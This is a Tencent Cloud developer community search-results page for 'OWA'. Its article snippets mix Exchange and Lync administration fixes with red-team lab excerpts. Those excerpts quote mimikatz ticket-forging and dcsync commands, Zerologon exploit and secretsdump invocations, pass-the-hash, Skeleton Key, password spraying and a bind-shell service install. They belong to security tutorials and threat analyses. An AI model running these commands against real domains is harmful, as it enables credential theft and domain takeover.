owa - 腾讯云开发者社区

文章/答案/技术大牛

发布

Exchange 2010 OWA Lync联系人列表故障案例

Exchange 2010 OWA 与 Lync 2010 的IM集成已经稳定运行几年，突然接用户反馈打开Exchange 2010 Outlook Web App 没有联系人列表项，无法展开与...Exchange 2010客户端访问服务器(CAS)一共3台，排查发现用户登录OWA是第2台，手动切换到第1、3台联系人列表正常。 ...最终决定针对CAS03重建OWA虚拟目录使用的Lync服务器配置，具体操作参考如下文档： https://technet.microsoft.com/zh-cn/library/gg420962.aspx...微软官方，没有操作详图】 http://www.exchangecn.com/exchange2010/20141130_521.html 【Exchange中文网，详细的集成配置图示】重建OWA...希望此案例可以帮忙做Exchange 2010与Lync 2010 OWA与IM集成的朋友。

7001 0

Exchange 2010 重定向OWA访问后会话超时解决办法

修改了IIS重定向OWA，并在OWA中去掉了要求SSL，登录后不能打开邮箱、新建邮件等会话，提示：“无法完成您的请求。发生这种情可能是由于安全原因或会话超时” ?...解决办法：经过一系列排错，问题很快定位到OWA SSL上，解决办法如下： 1、登录CAS服务器，依次打开\ Program Files \ Microsoft \ Exchange Server \... \ ClientAccess \ Owa. 2、用记事本打开web.config。...4、修改httpCookies = "false" requireSSL = "true" domain = "",将requireSSL = "true"修改为"false" 5、重启IIS，登录OWA

8414 0

您找到你想要的搜索结果了吗？

是的

没有找到

攻击新姿势：通过入侵Outlook Web应用（OWA）服务器来破坏机构网络

研究人员发现了一种先进的恶意软件，它可以通过感染机构的Outlook Web应用（OWA）邮件服务器来破坏机构的网络。...OWA的这个配置创建了一个理想的攻击平台，因为服务器同时暴露在内部和外部。因为OWA认证是基于域凭据的，所以获取访问OWA服务器权限的人将成为整个机构的域凭据的拥有者。”...攻击原理介绍 Cybereason的专家们发现了一个可疑的DLL“OWAAUTH.dll”，它与用于身份认证机制的合法OWA DLL名字相同。...这些恶意代码提供了存在于目标系统中的完整功能性后门，它允许攻击者操纵OWA服务器上的文件，并使其能够执行命令和任意代码。...Cybereason报告中继续陈述道：根据定义，OWA要求机构定义一组相对宽松的限制；在这种情况下，OWA配置的方式允许以面向互联网的方式访问服务器，这使得黑客能够在几个月的时间段内不被检测到的情况下

2.1K6 0

【工作】Proxy Server的优化 - 检测目标网站URL变化

在工作中，我在组里负责一个Proxy（代理）的Module，这个Module是针对微软的Office 365的邮件门户OWA实现，工作起来后，用户访问Office 365 OWA，无需再输入Office...365的网址，只需输入我们Proxy的地址，然后我们会将请求转送到Office 365 OWA，达到用户访问的目的，并使用户的体验如同实际访问Office 365 OWA一样。　　.../scripts/boot.worldwide.1.mouse.js, 200 9 /owa/ev.owa2, 200 10 /owa/ev.owa2, 200 11 /___/outlook.office365....com/, 302 12 /owa/ev.owa2, 200 13 /owa/, 302 14 /__/login/login.srf, 200 15 /owa/ev.owa2, 200 16 /owa.../scripts/boot.worldwide.0.mouse.js, 200 21 /owa/ev.owa2, 200 22 /owa/ev.owa2, 200 23 /owa/service.svc

1.3K8 0

APT34黑客组织工具泄露事件分析

owa/auth/getidtoken.aspx hxxps://95.0.139.4/owa/auth/logon.aspx hxxps://1.202.179.13/owa/auth/error1..../owa/auth/error3.aspx hxxps://180.169.13.230/owa/auth/error1.aspx hxxps://210.22.172.26/owa/auth/error1...222.66.8.76/owa/auth/error1.aspx hxxps://58.210.216.113/owa/auth/error1.aspx hxxps://60.247.31.237/owa.../owa/auth/logon.aspx hxxps://195.12.113.50/owa/auth/error3.aspx hxxps://78.100.87.199/owa/auth/logon.aspx.../owa/auth/error3.aspx hxxps://213.131.83.73/owa/auth/error4.aspx hxxps://187.174.201.179/owa/auth/error1

1.9K1 0

SharePoint 2013 Farm 安装指南——构建一个双层SharePoint Farm

2013图解教程——Part 1 利用AutoSPSourceBuilder和Autospinstaller自动安装SharePoint Server 2013图解教程——Part 2 安装并配置OWA...验证是否成功创建，在浏览器键入以下地址，如返回如下图所示的XML就代表创建成功（注：我在DC上已经加了一个OWA2013的A地址，IP指向自己（OWA Server），如下所示：） ? ...查看返回的XML信息，以验证是否创建成功，地址（http://owa2013.zoo.com/hosting/discovery）如下所示： ? ...最后创建SharePoint和OWA Server的绑定 New-SPWOPIBinding -ServerName violet -AllowHTTP Set-SPWOPIZone –zone...2013 中，确保不是作为系统帐户登录的（如当前登录的用户名显示为 sharepoint\system，该用户就无法使用 Office Web Apps 编辑或查看文档）一切都成功过后，即可以使用OWA

1.8K9 0

针对exchange的攻击方式

接口和协议 OWA owa即 outlook web app,即outlook的网页版。...在exchange server 2019 中，由于只细分了邮箱服务器和边缘传输服务器，所以开放了如OWA，ECP等接口的服务器即为邮箱服务器。...发现端口扫描 exchange会对外暴露接口如OWA,ECP等，所以我们可以通过一些端口特征来发现exchange。...setspn -q */* 特殊域名 https://autodiscover.domain.com/autodiscover/autodiscover.xml https://owa.domian/.../ 早期的Outlook还使用称为Outlook Anywhere的RPC交互工具使用 https://github.com/vysec/checkO365 版本确定可以通过OWA,ECP的HTML

4.1K2 0

白银票据（Silver Ticket）攻击

在当前域用户 mary 查询域控制器的共享目录的访问权限，发现没有权限： dir \\OWA2010CN-God\c$ ?...这个时候就能访问到域控的共享目录了： dir \\OWA2010CN-God\c$ ?...获取到的： Username : OWA2010CN-GOD$ NTLM : 78c403b6e04402158d26c5581f9e954b 然后为了防止其他票据对实验进行干扰，我们先清除内存中的票据...（域 mary 机器） kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org...这个时候输入命令，使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值： lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org

3.4K2 0

Skype for Business Server 2015和 Exchange Server 2013集成

6、OWA集成IM ?...然后输入以下命令来获取OWA的虚拟目录信息，并为其设置开启IM功能： Get-OwaVirtualDirectory | Set-OwaVirtualDirectory -InstantMessagingEnable...然后我们打开资源管理器定位到x:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Owa，找到web.config文件，右键选择打开方式...\Appcmd.exe recycle apppool /apppool.name:"MSExchangeOWAAppPool" 进行OWA虚拟目录的资源回收，以便我们刚刚修改的内容生效。 ?...然后我们再次打开OWA，这时右上角的IM功能就可以正常使用了。其实OWA里的IM功能区块一直有，但如果不做以上配置是无法正常使用的。这里我们就可以单击登录到IM进行登录了。 ?

1.1K2 0

【计算机网络】5G网络切片技术 - - 网络切片的多资源分配【含论文解读】

因此，我们选择了第二条路径，图中红色箭头表示，首先聚合每个用户不同资源的信息，即考虑用户满意度【选择用户的满意度计算最拥挤的资源】其次聚合用户，即考虑系统效率目标【使用聚合函数W有序加权平均(OWA...)运算符】OWA能够捕获一系列公平的态度，并允许我们根据不同的公平标准来定义不同的分配，合并一些现有的多资源分配规则，并允许将一些现有的单资源分配规则转置到多资源上下文中。...OWA函数的最大化是获得公平分配的良好候选者，其中公平从纯平等主义(最大化个人效用)发展到纯功利主义(系统效率)。...我们OWA的输入向量必须依赖于用户满意度向量，即一个包含每个用户对m个资源的满意度度量的向量。...以上就是这篇论文核心OWA的简单的一个概述在论文中测试了单资源分配规则和所提出的多资源分配规则，都是表现相当不错 3.进一步设想

7613 0

【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org dir \\OWA2010CN-God.god.org...\C$ psexec \\OWA2010CN-God.god.org cmd CVE-2014-6324配合mimikatz拿域控主机权限 WIN-域控提权-CVE-2020-1472 CVE-2020...该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows 计算机名：nbtscan -v -h 192.168.3.21 漏洞检测：python3 zerologon_tester.py OWA2010CN-GOD...192.168.3.21 重置空密码：python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21 连接后导出：python3 secretsdump.py...god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass WMI连接反弹：python3 wmiexec.py god/administrator@192.168.3.21

1561 0

T1028: WinRM for Lateral Movement

address=*+transport=HTTP #删除 listener winrm id -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org...@#45 winrm get winrm/config -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org -p:Admin!...New-PSSession -ComputerName OWA2010SP3 -Credentia 0day\Administrator Enter-PSSession id ?...Observations 在OWA2010SP3上可以看到父进程是wsmprovhost: ? Kibana中搜索calc*： ? 该日志来源于事件查看器中的sysmon： ?...在OWA2010SP3上查看日志： ?

2.1K3 0

Exchange中限制部分用户外网访问

使用一台反向代理设备来提供邮件系统公网发布，用户通过Internet访问OWA或者outlook anywhere、activesync的时候，如果是部分被限制的用户，那么反向代理就阻止访问请求。...我们把这部分用户添加到一个安全组中，然后通过IIS授权规则来对OWA、RPC（目的限制outlook anywhere）、EWS（目的限制mac的邮件访问）目录访问进行限制，然后在内网重新部署一台CAS...3、完成安装后，打开IIS管理器，选择OWA虚拟目录，然后双击授权规则 ? 4、在右侧操作窗口选择添加拒绝规则 ?...配置完毕，下面测试一下外部owa的访问，输入账号密码提示密码错误无法登陆了。 ? 打开outlook客户端，同样也提示登录失败。 ?

2.6K1 0

Exchange邮箱地址导出

Outlook Web Access或Exchange Web服务门户，那么此时的我们可以从Exchange服务器上下载整个全球通讯薄 Get-GlobalAddressList Brian Fehrman在OWA...的函数允许你通过一个请求就可以取回整个GAL，遗憾的是该功能仅在Exchange 2013版中实现，在测试中利用FindPeople函数的Get-GlobalAddressList能够在10秒钟内从远程OWA...门户获取4282个电子邮件地址，且OWA的"FindPeople"方法要求您使用PowerShell Version 3或更高版本，对于Exchange版本低于2013的情况，Get-GlobalAddressList...\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt Invoke-PasswordSprayEWS Invoke-PasswordSprayEWS

1.5K1 0

Exchange Server无法登录ECP，显示500意外错误？修复经验分享给你

有一客户的Exchange Server出问题了，Outlook客户端突然无法收发邮件，而且连OWA都无法登录，管理员想登录管理后台的时候才发现，输入管理员账号和密码后，ECP管理界面直接崩溃了，只显示...准备移除 OWA 虚拟目录，再重新创建试试，打开Exchange Management Shell，输入命令：Remove-OwaVirtualDirectory 'ServerName\owa (Default...Web Site)' //‘ServerNameE’为 exchange 主机名称；然而，移除失败了；创建 OWA 虚拟目录的命令：New-OwaVirtualDirectory -WebSiteName

3K2 0

【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙

dsrmadminlogonbehavior" -value 2 -propertyType DWORD 4.利用PTH传递攻击 privilege::debug sekurlsa::pth /domain:owa2010cn-god.../user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5 dir \\owa2010cn-god\c$ 缺点：弹出cmd窗口，才可以利用，容易被发现...内网域-权限维持-基于登录进程劫持-Skeleton Key 1、测试域内某个用户与DC通讯 dir \\owa2010cn-god\c$ 2、连接DC后，DC注入lsass进程 net use \owa2010cn-god...Admin12345” /user:god\administrator mimikatz： privilege::debug misc::skeleton 3、重新测试域内某个用户与DC通讯 net use \\owa2010cn-god...\ipc$ "mimikatz" /user:god\administrator dir \\owa2010cn-god\c$ 技术总结：因为Skeleton Key技术是被注入到lsass.exe

1681 0

Lync Server 2013 部署前端池支持NLB吗？

resource usage (especially CPU) on server nodes, important for all HTTP/S based applications like Exchange OWA...persistence or scheduling methods, especially important for mobile clients, SharePoint, RDS and Exchange OWA...Cannot provide pre-authentication and SSO functionality , especially important for Exchange OWA and Sharepoint

7544 0

【内网安全】横向移动&非约束委派&约束委派&资源约束委派&数据库攻防

s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god..." "exit" 3、导入票据到内存 mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org...@GOD.ORG.kirbi 4、连接通讯域控 shell dir \\owa2010cn-god.god.org\c$ 横向移动-实战靶机-约束委派&数据库攻防从外网 Weblogic 打到内网..." "exit" 3、导入内存： mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red...@REDTEAM.RED.kirbi 查看一下票据是否导出成功(多导入几次) 4、连接域控： dir \\OWA\c$

4211 0

【内网安全】横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

kerberos::ptc TGT_webadmin@god.org.ccache #使用mimikatz将票据(上传到目标主机上)导入内存票据有效期是10个小时 #连接目标上线 shell dir \\OWA2010CN-GOD...\c$ #未导入票据之前显示拒绝访问 #操作同上 shell net use \\OWA2010CN-GOD\C$ copy webserver4444.exe \\OWA2010CN-GOD\C$...sc \\OWA2010CN-GOD create bindshell binpath= "c:\webserver4444.exe" sc \\OWA2010CN-GOD start bindshell...TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit" #查看票据 shell klist #利用票据连接 shell dir \owa2010cn-god...f1818]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi #导入票据使用krbtgt协议的票据 shell klist shell dir \\owa2010cn-god

3751 0

如何使用ExchangeFinder在给定域中寻找Microsoft Exchange实例

当前版本的ExchangeFinder拥有从Microsoft Exchange 4.0到Microsoft Exchange Server 2019的每个版本的签名，并能够根据Exchange发送的X-OWA-version...Exchange version : Exchange Server 2016 CU22 Nov21SU Login page : https://mail.dummyexchangetarget.com/owa...version : Exchange Server 2016 CU22 Nov21SU Login page : https://autodiscover.dummyexchangetarget.com/owa...Exchange version : Exchange Server 2016 CU22 Nov21SU Login page : https://mail.externalcompany.com/owa...mail.o365.cloud Exchange version : Exchange Server 2013 CU23 May22SU Login page : https://mail.o365.cloud/owa

5153 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

Exchange 2010 OWA Lync联系人列表故障案例

Exchange 2010 重定向OWA访问后会话超时解决办法

攻击新姿势：通过入侵Outlook Web应用（OWA）服务器来破坏机构网络

【工作】Proxy Server的优化 - 检测目标网站URL变化

APT34黑客组织工具泄露事件分析

SharePoint 2013 Farm 安装指南——构建一个双层SharePoint Farm

针对exchange的攻击方式

白银票据（Silver Ticket）攻击

Skype for Business Server 2015和 Exchange Server 2013集成

【计算机网络】5G网络切片技术 - - 网络切片的多资源分配【含论文解读】

【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

T1028: WinRM for Lateral Movement

Exchange中限制部分用户外网访问

Exchange邮箱地址导出

Exchange Server无法登录ECP，显示500意外错误？修复经验分享给你

【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙

Lync Server 2013 部署前端池支持NLB吗？

【内网安全】横向移动&非约束委派&约束委派&资源约束委派&数据库攻防

【内网安全】横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

如何使用ExchangeFinder在给定域中寻找Microsoft Exchange实例

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐